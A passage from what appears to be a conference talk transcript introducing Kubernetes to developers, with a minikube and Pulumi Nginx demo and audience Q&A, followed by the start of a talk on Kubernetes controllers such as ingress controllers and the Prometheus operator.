an engineer in maybe the worst way possible: by trying to get K3s, like four or five years ago before it was as stable as it is now, to run on a Raspberry Pi for a miniature self-driving car I was building for work. Which sounds ridiculous in retrospect, but I promise we had a reason for it. And the way I explain Kubernetes now is really heavily influenced by that experience, by my experiences teaching bootcamp grads intros to Kubernetes, and by my experiences handling some comms-related kerfuffles for the Kubernetes project, wherein I learned just how little developers tend to know about Kubernetes even when their app is being deployed on it. So if you want to get a hold of me later, my Twitter handle is Dixie3Flatline. You can also try emailing me at work. I would not recommend trying that. I'm not great at replying to emails. So let's go.

First off, why should developers even care about Kubernetes? The answer is because you are probably going to have to touch it eventually. Even if you're not developing with Kubernetes locally now, it's increasingly likely that the application that you're building will be deployed with it. So it's similarly increasingly likely that you're gonna be expected to be able to test it locally so that there aren't any surprises. At the very least, you're gonna be expected to understand containers, as the shift from monolithic architectures to more of a microservices situation moves some of the responsibility for standing up and making infrastructure decisions from exclusively the ops team to more of a shared responsibility, which is kind of the whole point of DevOps, right? We're trying to meet people in the middle there rather than just chucking things over the fence. But nobody is asking you to become an expert. There are entire people whose job it is to be an expert in Kubernetes. The average developer does not need to do that, unless you wanna pivot towards specializing in Kubernetes, which a couple of people in the crowd here have done. You really just need the basics.

We'll start with defining what Kubernetes actually is, at a surface level. It is an open source container orchestration tool. And a container orchestrator is a tool that automates the management, deployment, and scaling of containerized applications. While it is possible to do all of this by hand, it is slow, it is unreliable, and it is a massive pain. You don't wanna have to do it. We've all heard that Kubernetes is difficult to learn. This is a longstanding thing that we're kind of trying to get away from, and part of that is talks like this and tracks like this, to make it feel more approachable. But I promise you that if you're in a situation where you need Kubernetes, it is much harder to go without it than it is to just learn it.

You can think of container orchestration in terms of a container ship. It's a super common way to explain the way this works. Kubernetes and other tools like it (there are other things that do this, like Docker Swarm and Mesos) are the thing that dictates which shipping containers go where on the barge in relation to other shipping containers, and what goes in them. So it's the person at the dock with a clipboard, right? These collections of organized containers are called clusters. So container orchestration means that there are now a whole bunch of things that you don't have to worry about anymore. Scaling your application happens with much less effort.
So say you get hit with a ton of traffic. Your app goes viral somewhere, and suddenly it's very, very popular and you need to handle it. In most cases, that is a one-line change in whatever tool you use to define your cluster and what your application looks like on it. You just bring up more replicas, right? Instead of going to your cloud host and provisioning more servers, deploying your application to those new servers, testing that application on those new servers, and configuring all of your proxies again. That's a much bigger pain, at least for me. You don't have to worry about deploying those individual servers anymore, or testing them. Kubernetes just spins up another replica, and a lot of security and networking concerns do get abstracted away from you. That is not to say that Kubernetes is inherently secure. It definitely isn't. It solves some security concerns that you have with other ways of deploying and scaling applications, but it introduces some new ones, so do not fall prey to the long-standing meme that Kubernetes is secure, because it's not. Same goes for networking. In some ways, it's easier. In some ways, it's harder. You are making trade-offs here. So complex Kubernetes may be, but that's because of how much previously manual labor it is doing for you. The operational overhead of getting going can be a pain, and it does require specialized knowledge to put it up there and to maintain it, but once you get to a point where you really, really, really need a tool this powerful, your team or your org should have the resources to handle that. I am of the opinion that not everything needs Kubernetes. In fact, a lot of things super don't need Kubernetes, but it never hurts to be prepared by kind of knowing what it is.

Besides all of that, the Kubernetes community is massive. It's really, really big. It's really, really friendly. It's made up of me and the track hosts and a bunch of other people in the crowd here, and hopefully the rest of you who are new and just went to the 101 workshop yesterday. We all want nothing but to build this better and extend it and make it easier for others to come help build it better. So I hope you join us. If you ever have a question after this talk, 10 years from now in the process of using Kubernetes, we have a huge online community and we will happily answer your question. If we don't know the answer to it, we know who does and we'll point you at them, which is the real power of the Kubernetes community. So come hang.

Before we go further and dive into Kubernetes architecture, I want to address the big blue whale in the room. I'm glad that I included this slide, because somebody asked me a question about it earlier today. Docker and Kubernetes get conflated quite a lot, and it can cause some problems. So what does Docker have to do with Kubernetes? If you're a developer, you might be used to using Docker locally for dev. This is a particular point of confusion for engineers touching Kubernetes for the first time, and one that we have underestimated before. So this is worth mentioning for the folks in the room who are touching Kubernetes for the first time and have like literally no context. Colloquially, we like to say Docker image, right? But it is really more of a Q-tips and Kleenex situation. When we say Docker image, the image Docker produces is actually what's called an OCI-compliant container image. OCI stands for Open Container Initiative, and other tools can produce OCI images too.
Docker is wildly popular, and it's also a really important part of the Kubernetes project's history. It was the original and only container runtime for Kubernetes for a while. So unfortunately, it's a little annoying, but at this point you kind of just have to figure out from context clues whether somebody literally means Docker Desktop, the tool you were using for local dev, or if they are referring to any old container image. But functionally, there is no difference between a thing produced by Docker Desktop and a thing produced by, like, Podman. Now you know. Hopefully that solves some confusion for the person I talked to earlier. Now that we've cleared that up, though, let's talk about the anatomy of a cluster and see where those containers end up living.

So Kubernetes is extremely complex. Wow, that's fun. Oh, I didn't even get to the good slide. There is a good slide too. What is happening? Is it my computer? I can't tell. Cause it's, oh, should I kill my cluster? Actually, how about I plug in my power on the other side and see if this computer is doing that thing, that it's haunted. Is it haunted? It's fine on my display. The next slide. That's just, it's a 2015. 2015. Yeah, yeah. Switch to the second port right here. Okay. No, put the actual video out. Oh, okay, yeah. I think so. Everybody got a teaser of my funny slide. I'm glad everybody actually thought it was funny too. Yeah, I just gotta, there we go. We're back. No glitches, buddy. I can switch laptops. I just can't use my terminal on the other one cause it's an M1. You know when you try switching laptops? Always have a backup. Yes. This is an anxious habit I picked up from Jessica Deen, because she always travels with a second laptop. Just in case. Okay, okay. It's my 2015 that's cursed. I was concerned that was gonna be a problem cause this laptop is old. It can't run a Kubernetes cluster and video at the same time, I guess. Anyway, sorry about that.

So, Kubernetes is super complex, right? And this complexity is one of the things that can make it so difficult to teach and learn. But fortunately, you only need the broad strokes at first, and we're getting better at explaining this complexity in a way that makes sense to humans. I promise you that almost nobody is a subject matter expert in the entirety of the whole situation. Most people specialize in only a couple aspects of Kubernetes, like networking or storage or security or authorization. Absolutely nobody is an expert in the whole kit and caboodle. I doubt even the people who originally built the project are at this point, because it's so different comparatively. And this diagram, or one like it, is how people usually explain the pieces of Kubernetes. I've taken this one straight from the Kubernetes docs, and it does a perfectly fine job. It's very well annotated, it's very clean. But I think it's boring and unmemorable, and I had a really bad idea that I have to get out, and y'all are trapped in a room with me. So, you have to learn from a different diagram. This is Kubernetes, okay? This is Kubernetes. If you use Kubernetes already, you will understand immediately, both architecturally and from the vibes this dog is exuding, what's going on here. This dog has tired cluster admin energy, like, for sure. And for everybody else, allow me to explain Kubernetes architecture for you with the help of this Chihuahua standing on eight cheeseburgers. This whole situation here is your Kubernetes cluster.
Each cluster needs to contain at least two things: a control plane and a worker node. The worker node contains the pods that make up your containerized application workload, and that is the bare minimum. That's what you need for a cluster. In a production environment, you would see one control plane, maybe across multiple machines, managing multiple nodes, maybe with each node on a dedicated machine to maintain high availability.

So the control plane is the thing that manages what's going on with your nodes and your pods. It's responsible for managing everything to do with your application workload and with the cluster itself. The control plane itself includes several smaller components as well. It's got the kube-apiserver, which is responsible for exposing the Kubernetes API; etcd, which I am now pronouncing correctly in this talk, which is a key-value store for all of your cluster data; the kube-scheduler, which takes care of assigning newly created pods to nodes; and two controller managers, which are responsible for managing a whole bunch of control logic, and one of them is cloud-specific. The exasperated Chihuahua is your control plane.

So a node is a worker machine responsible for managing one or more pods. The node contains all of the things the pods need to operate, like your container runtime, as well as the pods themselves. Nodes are made up of three parts: the kubelet, which is responsible for babysitting your containers by making sure that they're healthy; kube-proxy, which is for networking; and a container runtime, on which your containers ultimately will run. There are different container runtimes with different advantages. Most cloud providers default to containerd, which is actually pronounced container-dee. And each stack of burgers here is a node.

A pod contains all of the things that make up your application workload, in the form of containers. In the case of this image, our application workload is what I assume is a McDonald's dollar menu cheeseburger. So we have containers for a slice of cheese, ketchup, the burger patty, onions, pickles, the bun. Those little dehydrated onions are incredible, and I wish more places had them. Because we've got friends coming over, we've told this cluster that it needs to maintain four nodes, two pods each, for a total of eight replicas of the same cheeseburger. Thank you for letting me quell the screaming of that particular brain worm.

So, now you know what makes up Kubernetes architecturally, but you wanna play with it on your own. Deploy some stuff, scale it up and down. Good news: there is no reason to go straight to cliff diving into the ocean here. There are tools that abstract away some of the more nitpicky parts of running Kubernetes, like dealing with some specific networking and security concerns that just do not matter if you are doing it locally for fun testing playtime, but that you absolutely do need to worry about in prod. These tools, however, do not generally prevent you from digging into the API if you want to, so you can still experiment. So, we are gonna stand up a little cluster and deploy something really common to it: Nginx. I will say that since I've had to switch laptops, the demo itself is running on the other one. I have slides for it just in case of this, but at the end, if my laptop wants to give me a second chance, I will switch back over to it so we can actually poke at the running cluster. So, for my cluster, I use minikube.
minikube is what I prefer to use when I'm just messing around on a local machine, but K0s and K3s also exist and are really cool. They are both meant for more IoT and embedded applications, on really small, low-memory machines. You can, of course, also just use a full-featured managed Kubernetes service on a cloud provider, like GKE, or one of the 85 million ways AWS now has to deploy containerized workloads. It's truly getting out of control, and I honestly don't know what most of them do anymore at this point. Personally, I chuck everything on GKE because I know what it does. Anyway, for situations like this, I do prefer to stick with things that aren't gonna accidentally run up a huge cloud bill if I forget to tear down my infrastructure at the end, even if they're not exactly production-ready. So you will see me do some weird stuff and take some shortcuts, because I'm using minikube and not something like GKE.

So this is step one. I really wish I had my computer for this so that I could show you live, but I would have had to do this slide anyway, because installing minikube takes like 10 minutes on that computer. It will not be that slow for you if your computer is newer than 2015. Anyway, this is minikube installed and starting. You can see I've set some flags here. One is to specify a driver, just to show you that you can. This used to be necessary in order to use some particular aspects of Kubernetes on certain operating systems. So if you go to try this yourself and you're running into a weird problem where, for instance, an ingress controller isn't working, and you're on a Mac, it's because you need to be using the VirtualBox driver. There are a bunch of other drivers that come with it. It will default to Docker usually, but there's also HyperKit and a couple of others. You can also see that I'm setting the memory that minikube is allowed to use, which can be useful: by default, it wants to use eight gigabytes of memory, and the total available memory on this laptop is eight gigabytes, so obviously I can't let it do that. Anyway, running minikube start is literally all you need to get a small cluster off the ground. It's gonna immediately stand up a control plane and a single node for you.

You will also need kubectl, also called kube control, also called kube cuddle, or whatever; it has become a little bit of a cliquey thing, who says what. But it's, I'm looking at you, Quinn. You say kube cuddle? I know officially it's kube cuddle because it's got a little cuttlefish, but I just can't. My brain doesn't do that when I read it. Anyway, you need this tool in order to interact with your cluster directly, and you need it regardless of whether you are working locally or on a cluster in a cloud. You just hand it a file called a kubeconfig, which tells it where your cluster is and gives it the keys for how to access it. Helpfully, minikube places a kubeconfig for you in a default location that kubectl knows to look in. So this allows us to look at our cluster, see what's going on in there, and make it run stuff. Defining what's going on inside of your cluster can be done in a variety of ways. This is also ripped from the Kubernetes documentation. If you wanna just use vanilla Kubernetes, you can write your deployments and service definitions as YAML and apply them with kubectl. There are also a bunch of different infrastructure as code tools that you can use to stand up your cluster and deploy things to it.
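Collected in one place, that bootstrapping step is roughly the following. The driver and memory values are just illustrative (a plain minikube start works fine too):

minikube start --driver=virtualbox --memory=4096
# minikube writes a kubeconfig to the default location, ~/.kube/config,
# so kubectl picks it up automatically:
kubectl get nodes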
I will show you one of those later, but this is what the deployment YAML would look like for an Nginx deployment if you were to just use kubectl. At the top there, you can see kind: Deployment. That means that this file is going to create a Deployment object, and its only job is to dictate what container is being deployed, under what conditions, and how many replicas of it need to stay online. In this case, it is two replicas of a container running Nginx at version 1.14.2, running on port 80. A quick note on Kubernetes objects, by the way: there are a bunch of them. A Deployment is just one. I will also use a Service object later, but there are also Namespaces, Volumes, ReplicaSets, StatefulSets, a whole bunch. They all serve different purposes, and most of them are beyond the scope of this talk. Frankly, I think you could probably give an entire talk just on Kubernetes objects, just because there are so many of them.

And YAML is totally fine for simple examples like this, by the way. YAML files do, however, get really, really, really hairy if you have something vaguely complicated that you're trying to define. They get to a point where it can be kind of hard to read, it can get kind of hard to manage what's going on, and you poke one thing and the whole thing falls over. I also prefer to write in a programming language if I can, so that I can stand up my infrastructure alongside, or even in, my application. So because of this, I'm gonna show you what Pulumi looks like, instead of the kubectl approach. And I will tell you where to get this code so you can all just stand it up yourself too. Sometime tonight, I will put my slides up online on Notist, and they'll include links to where all this stuff came from in the Kubernetes docs.

So this is what that same Nginx deployment looks like in Python. It contains the exact same information, but it's expressed programmatically, and it's a lot more dense. For me, a person who has only ever been a developer or a developer advocate and has never worked in ops, this is much easier to read. And I know that that's not true for everyone, but I like to not have to learn a new syntax if I can avoid it. But yeah, this is the exact same information, though instead I've got six replicas, yeah, six, and it's running a more recent version of Nginx. But to make this thing actually functional, a deployment is not enough. We need a service too. This is a service definition expressed in Python. While Deployment objects dictate what's running and how many of them, Services in Kubernetes manage network access. This one, if I was not using minikube, would stand up a load balancer for us if we were running on something like GKE instead, but minikube does not support those. This is one of those places where I have to take a weird shortcut because it's minikube. Instead, it is going to give us a cluster IP. That decision-making is handled by the presence of a config value that I set before actually running anything.

So I've got all that Python, and I wanna turn it into an Nginx deployment running in a Kubernetes cluster. You just need to, in my case, run pulumi up, and it'll give me a little overview of what's gonna happen if I say yes: deployment and service defined, standing up in my project for this demo. I click yes, and it creates the resources for me in about 13 seconds. This is what I mean by speedrunning, and also what I mean by any percent, because this is not a production-ready cluster. This is how fast can I get a cluster online with something in it.
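A minimal sketch of what that Python looks like, modeled on the Nginx sample in the pulumi/examples repo mentioned later rather than the exact slide code, with the isMinikube config value I just described:

import pulumi
import pulumi_kubernetes as k8s

config = pulumi.Config()
is_minikube = config.require_bool("isMinikube")  # set with `pulumi config set` before `pulumi up`

app_labels = {"app": "nginx"}

# The Deployment: which container runs, and how many replicas stay online.
deployment = k8s.apps.v1.Deployment(
    "nginx",
    spec=k8s.apps.v1.DeploymentSpecArgs(
        replicas=6,
        selector=k8s.meta.v1.LabelSelectorArgs(match_labels=app_labels),
        template=k8s.core.v1.PodTemplateSpecArgs(
            metadata=k8s.meta.v1.ObjectMetaArgs(labels=app_labels),
            spec=k8s.core.v1.PodSpecArgs(
                containers=[k8s.core.v1.ContainerArgs(name="nginx", image="nginx")],
            ),
        ),
    ),
)

# The Service: network access. minikube doesn't support LoadBalancer,
# so fall back to a ClusterIP there.
frontend = k8s.core.v1.Service(
    "nginx",
    spec=k8s.core.v1.ServiceSpecArgs(
        type="ClusterIP" if is_minikube else "LoadBalancer",
        selector=app_labels,
        ports=[k8s.core.v1.ServicePortArgs(port=80)],
    ),
)

pulumi.export("frontend_ip", frontend.spec.apply(lambda s: s.cluster_ip))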
It doesn't matter how functional it is, because frankly, for teaching somebody Kubernetes, giving them an overly complicated full-stack application is, in my experience, not very useful. It's difficult to grasp. So 13 seconds is what it took to stand up these resources in a cluster, which, when I first started using this tool, I found unbelievably fast, and I super did not trust it. But it is there, and if this computer behaves, I will be able to poke at it. So we have all of this stuff here. It's got an output at the bottom, frontend IP. That is the cluster IP, because again, this is minikube, which does not support load balancers, but we can still look at our Nginx deployment from outside of the cluster and prove that it's online. So, another minikube oddity: I do have to do some port forwarding to be able to actually access that. But fortunately it is a one-liner with kubectl, and we only need a little bit of information from our running application in our cluster to do it.

We're gonna go look at some stuff here to confirm things are up. If you run kubectl get pods, you can see that I asked for two pods to be up, and they are up. And if you run kubectl get deployment, you can see my Deployment object, which, again, I told to keep two pods online. You can see it's got two of two ready, two available, two up to date. And it had been online for 42 minutes when I took the screenshot. But what we actually need is the name of the service we stood up, because remember, that is our network access. So, you guessed it, kubectl get service, and it lists the services we have running. You grab the name of that service there, you forward the port for the container to your local machine, and then you can call it and see that Nginx is online.

Well, I'm gonna try to get this computer up there without slides so that I can actually open up my terminal, and let's see, if I just kill Chrome, it'll go. And then we can look at stuff running. Let's find out. Thank you. You are a peach. Let's just mirror it. So do I still have things running? I do. So the whole cluster is still up here, and a thing that I wanted to show you, what I mean by Kubernetes scales fast: we've got two pods there, right? So say that we need this to be suddenly much bigger. Literally just add more replicas and update the config. It's gonna say I've got one thing to update. Let 'er rip. And now there are six of them, immediately. This is so fast because it's such a small workload, right? It's literally just one deployment, one service. It is Nginx, but still, Kubernetes is a little bit more approachable this way, when you're working locally with a really small workload, and it's a good starting point, right? Nginx is a thing that many of you have probably had to use in the course of doing your job. You at least know, this is one person raising their hand. Is that big enough? Yeah. Let me see if I can get it. Does that go? Ooh, the computer's starting to struggle a little bit there. Yeah, so we've got our six pods online. But this is a good starting point, a good jumping-off point for building something yourself, a containerized application in Kubernetes, because it can just pull containers from wherever. You can build a piecemeal application if you want. You can also write your own application inside of a Docker container, chuck it onto a public registry, and go from there, right? So I know that demos like this aren't technically impressive, right? There's not a lot going on here. It's not very complex.
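Collected in one place, those spot checks from the demo are roughly the following; the service name and local port are placeholders, use whatever your own kubectl get service shows and whatever port you like:

kubectl get pods
kubectl get deployment
kubectl get service
# forward the service's port 80 to localhost, then curl it:
kubectl port-forward service/<service-name> 8080:80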
I've only got two pieces. I don't have database interaction or a whole bunch of third-party stuff. I did not stand up a service mesh or whatever. But try, when you're learning something new, especially something as big as Kubernetes, not to jump straight into the deep end. It's more important to understand the foundational aspects of how a tool like this works, so that when you do get more complex and start adding pieces onto a demo as small as this, it is a little bit easier to intuitively figure out where you're going wrong if things aren't working the way you expect. If you understand the way the pieces of Kubernetes interact with each other, you're not gonna get lost as easily. It might not be as exciting, but you know how people advise that instead of banging at your keyboard for 30 minutes, you instead spend 15 minutes reading the docs? It's that. It's that. Do not just go in blind with a wildly complicated cluster with, you know, 15 microservices making up a JavaScript website. It's not necessary. It's not necessary. Start small instead.

But this is what Kubernetes looks like. This is how it works at a very high level. If you would like to learn more about Kubernetes, if you wanna go for, like, a 200-level situation, the interactive tutorials on the Kubernetes website are actually pretty good in my experience. I really, really like them. They also use minikube, so it'll be a familiar tool. And also, the CNCF Twitch account and the Kubernetes Slack are both super helpful. The Kubernetes Slack in particular is very, very, very active. There is a Getting Started channel, and I cannot repeat this often enough: there is no stupid question. Don't apologize for not knowing the answer to something. We want to help you learn as much as you wanna learn, and nobody's ever gonna make you feel bad here for not knowing something, because I didn't know stuff for a while, and there's still, like, so much stuff I don't know. So come, come help. And then once you're off the ground, you know, pay it forward; answer somebody else's question that they may be a little bit embarrassed to ask. And now I will unplug my computer, because it is still screaming and I don't wanna give somebody a motion-sensitive migraine because of the flashing on the right side of my screen. But if anybody has any questions or comments, let 'er rip.

Can you use Pulumi to manage Helm-based deployments? Yeah, yeah, yeah, you totally can. There is a Helm provider. And there isn't really a whole lot Pulumi can't manage as far as Kubernetes resources and cloud-native stuff goes, but yeah, I use it with Helm all the time. Yeah? Can you put the picture of the dog up again? I didn't get to take a picture. Yeah, yeah, absolutely. Would you like the picture with just the dog, or do you want it with the annotations? Okay, yeah, no problem. More questions? That's, that's fine. Is... No, no, no, it's okay. You know what? The dog came from Ian Coldwater's kid, who was writing a talk and tweeted asking, like, what is Kubernetes? For people in the room who don't know who Ian Coldwater is, they are a Kubernetes security expert and also very popular on Twitter. So, let me get the dog back. But Nara, Ian's kid, tweeted asking what is Kubernetes, and I responded with that dog. I was, like, super hungover.
But I just responded with this dog, and I was like, I can't explain it, but this is Kubernetes. And now I've explained it. So, yeah, there's my preferred Kubernetes architecture diagram.

I have one question. Oh, sure. Is there a path for migrating from minikube to a real Kubernetes cluster? I have found in the field that developers end up putting production stuff in minikube. If you have been building your entire app in minikube: minikube does have a lot of limitations that you're not going to see with something like GKE or EKS or whatever. And I would not say that you can directly port a deployment that was intended for minikube, taking the shortcuts and roundabouts that minikube requires, to a full-fledged situation. There are issues that you have to consider, and some of them are those networking problems that you saw me go through. Those problems, you can't port directly over to GKE. You are going to have to use a real load balancer. Do not return the cluster IP. You can return the cluster IP, but, you know, don't. Right, so then... Right, also minikube stubs out all the storage. Yes, minikube is not intended for production. It's extremely not. Use it for testing. Use it for a playground. Do not try to use minikube for prod. It's got all kinds of issues that cannot be addressed in minikube: security issues, networking issues, storage issues. So don't build from the ground up with minikube in mind. It can. I'm not sure what, from a technical perspective, prevents the LoadBalancer objects from being available in minikube. Gwen, do you know? No? Hi. Yeah. Yeah, do you want to repeat what people are saying if they're not on the mic? Oh, yeah, sure, sure, sure. The question was, in minikube, are peer-to-peer connections not available between pods? It can communicate between pods, but I am not sure why the LoadBalancer object doesn't exist. Does anybody actually know the answer to that? Yeah, it does. Good point. kind handles it, though, so.

Yeah, I have a related question. So you're saying don't just do your entire development in minikube, but sometimes it's useful to have sort of a development replica of your production cluster so you can do local development. So I'm curious what you think the appropriate story is there. How do you end up building that such that you can have a better developer experience for people working locally? Yeah, so there are just special considerations for minikube that, unfortunately, you can't get around if you're trying to clone your production environment. I think kind gets a lot closer to having a true ability to clone a production environment. That is what Gwen here in the front uses. I like kind. I'm using minikube for this strictly because it is what the Kubernetes interactive tutorial on their website uses, so I wanted to make sure that there was some consistency there. But yeah, unfortunately, if you are trying to use minikube as your local dev environment and you want it to be a true clone of prod, you are probably going to have a bad time, and you're better off just using kind or something like it that's a little bit more flexible.

There was somebody in the back that had a question. Thank you, Josh. Hey, thank you. So does this mean that if the pod goes down, the dog will just eat the hamburger? The dog does not get to eat the hamburgers.
The hamburgers are reserved for users, which are our friends that are coming over to eat those hamburgers. Unfortunately, the dog is just there to make sure that the hamburgers exist, and perhaps protect them from other dogs. Gotcha. Yeah, well, maybe the cat. I find that using kind works well, because you can programmatically spin up multiple clusters with it, as can Rancher Desktop. Additionally, you may want to add MetalLB to get that cluster happy. Okay, thank you.

Hello, more of a Pulumi question rather than a Kubernetes question? Sure. I'm wondering if there are any good static analysis tools, since we get to use real programming languages. Like, a really basic example: I'm more practiced in CloudFormation, so one really annoying thing, right, is if you don't set your auto-scaling group properties correctly. Like, oops, I set my desired servers to less than what I said my minimum was. Submit the template, then wait 10 minutes, and then you're like, oh, you didn't do it right. So I'm curious, since we're using real programming languages, if there are any good tools to take advantage of that, to do this kind of checking and make sure, hey, nope, don't submit that yet, there are some mistakes. There may be a third-party one that I'm not aware of. The closest thing built into Pulumi is that if you run pulumi preview, it's going to give you an idea of what changes are happening, and some of those potential changes can cause a failure right there on pulumi preview. So for some of them, you will know in advance whether this is just going to barf, which is good. But as far as actually analyzing whether or not you've made a logical misstep in your code, Pulumi doesn't do that itself. There may be a third-party tool. Gwen, do you know of any? Gwen is also, she is an engineer at Pulumi. Are there any static analysis tools for Pulumi that would identify when you've made a logical error in your deployment, like setting a minimum different from a maximum in a way that conflicts? For Pulumi? Yeah. Like, you would just run pulumi preview to see a lot of that stuff, right? Yeah, you run pulumi preview, and the info output should have most of the standard logs, and you can also access diagnostics, run it in verbose mode, all of that, yeah. Yeah, do you know of a third-party tool that goes more in depth? I don't. No, but sometimes I cheat by going to the debugging page on Pulumi.com, and I run log to standard error, and I get a bunch of logging output, and then I use grep. That's a hot tip, actually. Don't tell my boss I said so, though. This is recorded.

I'll also say that because it's a complicated stack, there's a whole industry in analysis tools, so look in the CNCF landscape. Yeah, definitely. I realize that's a bit of an adventure, but there... You're asking for a lot here, Josh. Yeah, yeah, but I mean, because it's a complicated stack, you're actually probably gonna be stringing together multiple tools: one's gonna look at security, one's gonna look at whether auto-scaling is actually gonna work how you've configured it, and then another one's gonna do something else. Oh, and you absolutely need an observability tool. Do not just go pawing through logs by yourself, ever, unless you really need to double-check something.
There are observability tools that handle that for you and make it a little bit more human-readable, less messy, because the logging output can get very messy. Are there any more questions? Yeah, hi. Hi. Thank you very much for a very nice talk, and the dog is simply amazing. Thank you. Well, it's maybe a newbie question, but there were comments that minikube lacks a load balancer, and I was playing with it, like, literally yesterday, and there is an add-on to minikube called ingress, so you can say something like minikube addons enable ingress. Isn't it the same as a load balancer, or what is your comment on that? The Nginx ingress is not quite the same as a load balancer. It's an ingress controller, but that is actually a thing I mentioned. It was why I was setting a driver: if you are standing up minikube and you are setting up an ingress controller, it can cause problems on old MacBooks, and you need to use a different driver. Yeah, an ingress controller is a different thing, but in that case, it can serve a similar purpose to a load balancer, so it kind of gets you there, right? It gets you the same result, but it is not literally the same thing as a load balancer.

We have time for one more question. How does Pulumi know to use your local minikube cluster? Do I have that code on this computer? Probably not. It is on this one. So my code makes that decision for me, actually, because I knew that I was gonna be doing this with minikube, but sometimes I do this with a real provider. So when you are setting up Pulumi in the first place, it is going to look for a kubeconfig, and it's going to look for a kubeconfig in the default location first, exactly where kubectl looks for it, which is in the hidden .kube directory in your home directory. So it looks there, and your kubeconfig just needs to contain the access keys for your local minikube cluster, and then Pulumi will just pick it up. But if you want the same decision-making I had, where this can run on a local cluster or on a remote cluster, I use a Pulumi config value. So it's just isMinikube, config require isMinikube, and before I run pulumi up, I just set that config to true or false, and then it makes a decision from there. There's a little if-else at the bottom of my code. This particular sample code is online in the Pulumi GitHub account, in the examples repo. So just github.com slash pulumi slash examples, and there's a whole ton of Kubernetes examples in there, and this is the Nginx one. So you can just rip that code, and it will go. And then I think that's it, that's time. Yeah, thank you very much, Kat.

Okay, stick around. What's next? What is a Kubernetes controller? Why would you want to replace yours? What would you want to replace it with? Jim will be answering those questions in 10 minutes. Test, test, test, okay. Perfect. If you have your cell phone in your pocket, on the pocket. Interference, got it. Then to turn it off, I just, okay. Welcome back, everybody. And next up, we have Jim Tario, who is going to acquaint you with the wonderful world of Kubernetes controllers. So welcome, Jim.

Hello, everybody. "Wonderful" is a lot, because Kubernetes can be great, but it can also be a pain in the ass. So, you know, as we all know, if you play with it, it's very useful. And I have been playing with it for the past five years. Actually, so yeah, we'll start off.
To break the ice, I wanted to introduce myself, as this is actually pretty much my first time doing a talk at a conference, so I figured I'd introduce myself. Thank you. So, actually, I'm a local. I grew up in Santa Ana, California, which is about an hour away if you go a little bit down south. It's in Orange County. I'm Hispanic, second generation; my parents are from El Salvador. And yeah, right now, currently, family of four: wife and two kids, one year old and four years old. And I graduated from CSUN, so I've stayed in California pretty much my whole life. And CSUN, if you're not familiar with the area, it's right up here in north LA. I graduated in 2016, and since I graduated, I went to work at Blizzard. I actually did an internship when I was at CSUN, and then got hired full-time from there. So I started off as an associate, junior, sorry, and then worked my way up to senior. I worked on the Battle.net team. I was there for about three years. Yeah, three years. And it was mainly dealing with the public-facing APIs and websites, so like PlayOverwatch, WorldofWarcraft.com and stuff like that. Currently, I've gone over to Team 3, which is the Diablo team, the Diablo franchise. So if there's, like, Diablo issues, either me or one of my coworkers is getting called up if there are some reliability issues. And just hobbies of mine: I enjoy playing poker, fantasy football, watching anime, reading manga (One Piece, if anyone is familiar with it, is my favorite), I enjoy snowboarding, and of course, video games. And in case you want to get my social media, I'm somewhat active. I don't use it as much as I should, but you can follow me, it's Jinx. It's funny, because this account, I got it in 2009, I think, and I don't know why I added a three on there. Now I can't change it; someone took the plain one, so I can't even put just Jinx on there. But yeah.

So, what are controllers? Controllers work as a control loop. They try to keep a desired state on your system. So you have a current state and you have a desired state. The Kubernetes documentation has a very good example of this: a thermostat. A thermostat, you set it to, let's say, 70 degrees, and it will try to keep that desired state over time. So if the temperature increases, it's going to go back and try to decrease it. That's how a controller works in your system. What it does is watch the state of your cluster: it looks at Kubernetes resources and reconciles them. A good example would be pods. If your pod goes down, the current state goes to zero, but your desired state might be one or two. So what the controller will do is spin up another pod, and that's pretty much how it operates.

There's also a term called operators, which are domain-specific controllers, and these can be very specific to an application. An example would be the Prometheus operator: it will look at Prometheus custom resources that you've created or spun up, so if you create a new resource, let's say a Prometheus rule, the controller is going to look at it and create things for you. I'll go into more details as I go on, but just to give a heads-up: I kind of blur the line between a controller and an operator. They are different, but I just like using the term controller. So in case I'm talking about a specific application where it's actually an operator, I might say controller; just a heads-up that I'm going to do that. So let's see.
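To make the control-loop idea concrete, here is a little Python pseudocode sketch. The helpers (get_current_replicas, create_pod, delete_pod) are made-up stand-ins for watching and updating the cluster, not real APIs:

import time

DESIRED_REPLICAS = 2  # the desired state, e.g. from a Deployment spec

while True:
    current = get_current_replicas()  # observe the actual state of the cluster
    if current < DESIRED_REPLICAS:
        create_pod()                  # drive actual state toward desired state
    elif current > DESIRED_REPLICAS:
        delete_pod()
    time.sleep(10)                    # then loop around and check again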
Okay, so we'll start off with the first one, the ingress controller. It kind of came up at the end of the last presentation, so we'll talk about the ingress controller. I'll go over three, just because these are supported by the Kubernetes project, but there are a lot, a lot of controllers. Some of you might be familiar with Kong; there's also Traefik, or "traffic," I'm not sure how to pronounce that one, but those would be some of the more popular ones as well. So what an ingress controller does depends a bit on which controller you're using, but basically it talks to the control plane, the API, and if an ingress or service gets created, it will look at it, and if it matches certain requirements, it will spin up ingress for it. So, NGINX uses annotations. You use an annotation, let's say a hostname, and under that you put the address that you want; the controller will look at it and spin up an ingress with the hostname you have in the annotation. The reason I lead with the NGINX ingress controller is that you pretty much don't need a cloud provider. You can have your own, so you spin up your own cluster, and it can be in a different cloud or a private cloud, OpenStack or whatever it is. You don't have to rely on a provider. The AWS Load Balancer Controller works in a similar way to the NGINX controller, but it actually creates load balancers on AWS. So it can create ALBs or network load balancers, and it works in a very similar way, where it's annotations that get added. And then ingress-gce is just the Google Cloud version of it. So those would be three options in case you want to allow external access to one of your services. Those are the ingress controllers.

I'll share these slides after, in case you want the links; I put them on there in case you want to go to the GitHub repos. A lot of these are open source, and my preference is Helm charts; in case you do want to install them, there are Helm charts as well, but these links are just the applications themselves. And as I mentioned, there are a lot of ingress controllers, and if you click this link, it's the Kubernetes documentation. Last time I looked, they list 15-plus controllers on there. So in case you look through these and none of them fit your use case, you can go to that page and see if there's anything else you might be able to check out.

Then for monitoring, the controller that I prefer is the Prometheus operator I mentioned. The Prometheus operator creates custom resources on your cluster. So, for example, if you're familiar with the Prometheus operator, they create custom resource definitions, like one called PrometheusRule, and there are ServiceMonitors and PodMonitors, and these are pretty much resources that the operator is gonna look at. So if you create a resource of one of those kinds, it will spin things up for you. If you create a PrometheusRule, then depending on how you set it up, it will wire up alerts in Alertmanager, or however you have it configured. It has ServiceMonitors, which are like an abstraction layer in case you want to monitor a service.
It looks at labels, and it makes things very dynamic, instead of having to manually create things or make changes, or maybe even redeploy an app to add stuff. So it makes it very dynamic. And of course, this one is an operator, and it watches the API for any of these CRDs.
